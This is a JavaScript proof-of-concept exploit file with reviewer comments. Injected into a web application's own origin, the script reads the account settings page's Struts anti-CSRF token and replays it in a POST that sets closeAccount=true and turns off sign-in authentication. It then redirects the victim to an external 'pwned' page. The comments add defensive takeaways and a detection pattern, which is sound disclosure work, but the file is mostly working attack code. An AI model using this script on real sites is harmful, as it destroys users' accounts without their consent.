poc2.js
// Proof-of-concept: a script that reads the anti-CSRF token from the account
// settings page and replays it in a settings POST that carries closeAccount=true.
// Both requests use relative URLs and the first response is read as a parsed
// document, so the script only has an effect when it already runs inside the
// application's own origin (for example through a script-injection flaw). A
// per-form token defends against cross-site forgery; it does not defend against
// script executing in the same origin, which can simply read it.
// Defensive takeaways: remove the injection point, restrict script sources with a
// Content-Security-Policy, and require re-authentication before account closure --
// the password fields in the POST body below are sent empty.
var url = "/account_settings.htm";
var xhr = new XMLHttpRequest();
// Ask the browser to parse the response as a DOM document so it can be queried.
xhr.responseType = "document";
xhr.open("GET", url, true);
xhr.onload = function (e) {
// Continue only when the settings page was fetched successfully.
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// NOTE(review): `page` and `token` are assigned without a declaration, so they
// become implicit globals (and would throw in strict mode).
page = xhr.response
// Read the Struts token by element name. The code reads `.value`, which suggests
// a form field rather than a meta tag -- confirm against the page markup.
// NOTE(review): no check that the element exists; a missing token throws here.
token = page.getElementsByName('org.apache.struts.taglib.html.TOKEN')[0].value
// Log the token to the console (PoC output only).
console.log("The token is: " + token);
// Second request: form-encoded POST back to the same settings endpoint.
var xhr2 = new XMLHttpRequest();
xhr2.open("POST", "/account_settings.htm", true);
xhr2.setRequestHeader("Content-Type", 'application/x-www-form-urlencoded; charset=UTF-8');
// The body replays the freshly read token and sets closeAccount=true along with
// signinMethod=never and authenticate=never; the token is concatenated without
// URL-encoding. For detection, a settings GET followed at once by a POST carrying
// closeAccount=true in the same session is the pattern this produces.
// NOTE(review): the '¤' characters look like an HTML-entity decoding artifact of
// the page rendering; the string is left exactly as found.
xhr2.send('org.apache.struts.taglib.html.TOKEN='+token+'&originalLangLocale=en_US&signinMethod=never&langLocale=en_US&originalEmailReceipts=false&enabledComputerBackup=on&originalComputerBackup=true&originalB2CloudStorage=false&originalGroups=false&originalEnableSso=false&enableSso=false&oauthSsoProvider=¤tPasswordChangeEmail=&newEmail=&confirmNewEmail=&changeEmail=¤tPassword=&password=&confirmPassword=&changePassword=¤tPasswordChangeSMS=&smsPhoneNumber=&smsSecurityCode%22=&verifiedSmsPhoneNumber=&verifiedSmsCountryCode=&changeSmsPhoneNumber=¤t_verify_email=&verifyEmailSecurityCode%22=&authenticate=never&totpVerificationCode=&genBackupCodes=on&authKey=&totpHash=&originalEnabledSmsFallback=false&removePhoneNumber=&closeAccount=true&changeAuthSettings=&authSettings=&authMethod=&smsBackupCodes=');
// The handler is attached after send(); the request is asynchronous, so it is
// still in place before the load event fires.
xhr2.onload = function(e){
if( xhr2.readyState == XMLHttpRequest.DONE && xhr2.status == 200 )
{
// On a 200 response, navigate the browser to an external page after two seconds.
// A 200 status alone does not prove the server applied the change.
setTimeout(function(){ window.location.href="https://zonduu.me/pwned"; }, 2000);;
}
}
}
};
// Start the initial GET; everything above runs from its load handler.
xhr.send(null);